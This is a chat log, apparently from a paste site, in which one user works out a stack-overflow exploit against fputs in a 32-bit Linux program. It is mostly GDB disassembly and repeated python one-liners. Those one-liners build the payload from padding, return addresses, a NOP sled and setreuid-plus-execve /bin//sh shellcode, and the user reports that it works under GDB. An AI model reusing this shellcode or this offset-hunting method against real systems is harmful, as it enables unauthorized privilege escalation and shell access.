Untitled

a guest
Dec 22nd, 2014
  1. davidgomez79 (12/22/2014 3:11:44 AM): i figured out how to hack this.. it's too hard
  2. davidgomez79 (12/22/2014 3:11:54 AM): to do by a single python line gonna need a script
  3. davidgomez79 (12/22/2014 3:11:59 AM): things to keep in mind
  4. davidgomez79 (12/22/2014 3:12:12 AM): ESI overflow is after 1041 bytes decimal
  5. davidgomez79 (12/22/2014 3:13:00 AM): 0x8424cb <fputs+43>: mov (%esi),%eax 0x8424cd <fputs+45>: and $0x8000,%eax 0x8424d2 <fputs+50>: test %ax,%ax 0x8424d5 <fputs+53>: jne 0x84250b <fputs+107>
  6. davidgomez79 (12/22/2014 3:13:49 AM): we need to pass that test.. so we have to have \x??\x??\x??\xx80
  7. davidgomez79 (12/22/2014 3:14:03 AM): right at the start of our buff. other bytes don't matter
  8. davidgomez79 (12/22/2014 3:15:37 AM): 0x84250b <fputs+107>: cmpb $0x0,0x46(%esi) 0x84250f <fputs+111>: je 0x842584 <fputs+228>
  9. davidgomez79 (12/22/2014 3:16:27 AM): then we get here... so buffer + 46 hex needs to be a non zero.. 46h = (70 decimal)
  10. davidgomez79 (12/22/2014 3:17:23 AM): 0x84250b <fputs+107>: cmpb $0x0,0x46(%esi) 0x84250f <fputs+111>: je 0x842584 <fputs+228> 0x842511 <fputs+113>: movsbl 0x46(%esi),%eax 0x842515 <fputs+117>: mov 0xfffffff0(%ebp),%edx 0x842518 <fputs+120>: mov 0x94(%esi,%eax,1),%eax
  11. davidgomez79 (12/22/2014 3:19:52 AM): ^^^ that's the last part.. this is what i couldn't understand, i kept landing in the same spot that i couldn't put code in. that means our buffer + 70 also gets put into eax... which has to be our pointer to our code and then there is the 94+1 line that gets confusing..
  12. davidgomez79 (12/22/2014 3:20:08 AM): cuz of GAS syntax but after that line we're set, there is a call [eax]
  13. davidgomez79 (12/22/2014 3:24:22 AM): so it's print "\x80\x80\x80\x80" + "A"* (70-4)+"01"
  14. davidgomez79 (12/22/2014 3:24:30 AM): that will make EAX = 1 at fputs+113
  15. davidgomez79 (12/22/2014 3:25:50 AM): then at fputs+12 it's ESI+EAX+148+1 (keep in mind eax = 1 but there is another one that confuses me, stupid GAS)
  16. davidgomez79 (12/22/2014 3:26:31 AM): so that leaves figuring out what fputs+120 really does and finding out where our stack begins.. my guess is EBP, ebp is always used for pointers..
  17. davidgomez79 (12/22/2014 3:26:49 AM): so our hack script would be
  18. davidgomez79 (12/22/2014 3:27:17 AM): something to do the math.. and echo our exploit
  19. davidgomez79 (12/22/2014 3:28:16 AM): my guess is fputs+120 = ESI+150
  20. davidgomez79 (12/22/2014 3:32:44 AM): print "x80"*4+"A"*66+"01"+"B"*79+ret address+shellcode34bytes+891 nops+ our ESI which has to point to start of our buffer we created
  21. davidgomez79 (12/22/2014 3:32:49 AM): ^^ that's the hack...
  22. davidgomez79 (12/22/2014 3:33:22 AM): 891+150 = 1041
  23. davidgomez79 (12/22/2014 3:37:16 AM): `python -c 'print "\x80"*4+"B"*79+"\xc1\xc2\xff\xbf"+"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"+"\x89"*891+"\xba\xbb\xff\xbf"'`
  24. davidgomez79 (12/22/2014 3:37:31 AM): ^^^ that should do it.. i just have to figure out ret address and esi.. i just put whatever for now
  25. davidgomez79 (12/22/2014 3:37:57 AM): i don't know why i put \x89.. should be \x90 wtf.. for the nops
  26. davidgomez79 (12/22/2014 3:38:07 AM): `python -c 'print "\x80"*4+"B"*79+"\xc1\xc2\xff\xbf"+"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"+"\x90*891+"\xba\xbb\xff\xbf"'`
  27. davidgomez79 (12/22/2014 3:38:59 AM): i'm missing shit still
  28. davidgomez79 (12/22/2014 3:39:55 AM): `python -c 'print "\x80"*4+"A"*66+"01"+"B"*79+"\xc1\xc2\xff\xbf"+"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"+"\x90*891+"\xba\xbb\xff\xbf"'`
  29. davidgomez79 (12/22/2014 3:42:46 AM): `python -c 'print "\x80"*4+"A"*66+"01"+"B"*79+"\xc1\xc2\xff\xbf"+"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"+"\x90"*891+"\xba\xbb\xff\xbf"'`
  30. davidgomez79 (12/22/2014 3:42:56 AM): the last one was missing a " before *891
  31. davidgomez79 (12/22/2014 3:58:39 AM): `python -c 'print "\x80"*4+"A"*66+"1"+"B"*79+"\xc1\xc2\xff\xbf"+"\x90"*851+"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"+"\x5f\xd2\xff\xbf"'`
  32. davidgomez79 (12/22/2014 3:58:53 AM): ^^ we're getting somewhere, i had 01 instead of \x01
  33. davidgomez79 (12/22/2014 3:59:03 AM): and still i did the nop size wrong dunno why
  34. davidgomez79 (12/22/2014 4:01:26 AM): sweet got it right so far EAX = 1
  35. davidgomez79 (12/22/2014 4:01:53 AM): last step is wrong cuz i don't know yet but time to fix it
  36. davidgomez79 (12/22/2014 4:01:56 AM): the c1\c2
  37. davidgomez79 (12/22/2014 4:04:38 AM): `python -c 'print "\x80"*4+"A"*66+"\x01"+"B"*79+"\xac\xd3\xff\xbf"+"\x90"*853+"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"+"\x5f\xd2\xff\xbf"'`
  38. davidgomez79 (12/22/2014 4:04:53 AM): `python -c 'print "\x80"*4+"A"*66+"\x01"+"B"*79+"\xac\xd3\xff\xbf"+"\x90"*853+"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"+"\x5f\xd2\xff\xbf"'`
  39. davidgomez79 (12/22/2014 4:04:59 AM): ^^^ that is getting us to the very last part
  40. davidgomez79 (12/22/2014 4:05:10 AM): i guess i just don't understand that line
  41. davidgomez79 (12/22/2014 4:05:24 AM): 0x842518 <fputs+120>: mov 0x94(%esi,%eax,1),%eax
  42. davidgomez79 (12/22/2014 4:05:37 AM): once we get past this ^^ we're done, there is a call EAX shortly after
  43. davidgomez79 (12/22/2014 4:06:04 AM): 0xe4451f <fputs+127>: mov %edx,0x8(%esp) 0xe44523 <fputs+131>: mov 0x8(%ebp),%edx 0xe44526 <fputs+134>: mov %esi,(%esp) 0xe44529 <fputs+137>: mov %edx,0x4(%esp) 0xe4452d <fputs+141>: call *0x1c(%eax)
  44. davidgomez79 (12/22/2014 4:06:07 AM): that's what's after
  45. davidgomez79 (12/22/2014 4:09:59 AM): i see my B's are off by one 79 should be either 78 or 80
  46. davidgomez79 (12/22/2014 4:11:42 AM): 'print "\x80"*4+"A"*66+"\x01"+"B"*79+"\xac\xd3\xff\xbf"+"\x90"*853+"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"+"\x5f\xd2\xff\xbf"'`
  47. davidgomez79 (12/22/2014 4:11:48 AM): something's wrong with my string now, won't echo
  48. davidgomez79 (12/22/2014 4:12:28 AM): duh missing python part
  49. davidgomez79 (12/22/2014 4:16:31 AM): `python -c'print "\x80"*4+"A"*66+"\x01"+"B"*78+"\xac\xd3\xff\xbf"+"\x90"*854+"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"+"\x5f\xd2\xff\xbf"'`
  50. davidgomez79 (12/22/2014 4:16:41 AM): thats it.. but we end up in EIP 90909090
  51. davidgomez79 (12/22/2014 4:16:42 AM): haha
  52. davidgomez79 (12/22/2014 4:16:49 AM): i know what i'm missing now.. i just don't know GAS
  53. davidgomez79 (12/22/2014 4:17:07 AM): EAX+1C we need a 2nd ret address
  54. davidgomez79 (12/22/2014 4:17:39 AM): its a pointer to a pointer
  55. davidgomez79 (12/22/2014 4:17:49 AM): not a pointer
  56. davidgomez79 (12/22/2014 4:18:47 AM): ok 1c =
  57. davidgomez79 (12/22/2014 4:18:58 AM): 28
  58. davidgomez79 (12/22/2014 4:19:41 AM): so we can point again to 5f2fffbf
  59. davidgomez79 (12/22/2014 4:19:47 AM): there and at 28 we have
  60. davidgomez79 (12/22/2014 4:19:59 AM): our ret address
  61. davidgomez79 (12/22/2014 4:20:06 AM): but we'll have to start over too hard
  62. davidgomez79 (12/22/2014 4:20:12 AM): we'll change our nop sled instead
  63. davidgomez79 (12/22/2014 4:29:18 AM): GOT IT!!
  64. davidgomez79 (12/22/2014 4:29:23 AM): in GDB should work outside
  65. davidgomez79 (12/22/2014 4:29:42 AM): `python -c'print "\x80"*4+"A"*24+"\xac\xd3\xff\xbf"+"B"*38+"\x01"+"C"*78+"\x5f\xd2\xff\xbf"+"\x90"*854+"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"+"\x5f\xd2\xff\xbf"'`
  66. davidgomez79 (12/22/2014 4:30:34 AM): doesn't work.. but gdb usually adds 10 to addresses
  67. davidgomez79 (12/22/2014 4:30:37 AM): so subtract
  68. davidgomez79 (12/22/2014 4:32:49 AM): or add
  69. davidgomez79 (12/22/2014 4:32:52 AM): i think i have to add
  70. davidgomez79 (12/22/2014 4:38:31 AM): `python -c'print "\x80"*4+"A"*24+"\xac\xd3\xff\xbf"+"B"*38+"\x01"+"C"*78+"\x5f\xd2\xff\xbf"+"\x90"*854+"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"+"\x5f\xd2\xff\xbf"'`
  71. davidgomez79 (12/22/2014 4:38:42 AM): ^^ fawken shit.. works flawless in GDB.....
  72. davidgomez79 (12/22/2014 4:39:09 AM): picks up all i want, my 01 in EAX after B*38, picks up my ret address, my 808080, everything
  73. davidgomez79 (12/22/2014 4:39:16 AM): its just that GDB throws off the offset
  74. davidgomez79 (12/22/2014 4:39:28 AM): so i have to fiddle with
  75. davidgomez79 (12/22/2014 4:39:41 AM): \xac\xd3\xff\xbf
  76. davidgomez79 (12/22/2014 4:39:44 AM): and both copies of
  77. davidgomez79 (12/22/2014 4:39:52 AM): \x5f\xd2\xff\xbf
  78. davidgomez79 (12/22/2014 4:40:08 AM): need a python script to do that for me
  79. davidgomez79 (12/22/2014 4:40:14 AM): try a range but i suck at python
  80. davidgomez79 (12/22/2014 4:43:34 AM): i don't know why i thought i needed 891 for nops my math was off there
  81. davidgomez79 (12/22/2014 4:46:50 AM): 24+4+38+1+78+4+854+34=
  82. davidgomez79 (12/22/2014 4:47:20 AM): 1037
  83. davidgomez79 (12/22/2014 4:47:27 AM): 4 bytes missing.. probably something i'm overlooking
  84. davidgomez79 (12/22/2014 4:47:54 AM): oh the 8080800
  85. davidgomez79 (12/22/2014 4:47:57 AM): ok the math is right
  86. davidgomez79 (12/22/2014 5:30:59 AM): maybe u can help me tomorrow
  87. davidgomez79 (12/22/2014 5:31:06 AM): write a python script, we're pretty much done
  88. davidgomez79 (12/22/2014 5:31:16 AM): script to try a range of 100 offsets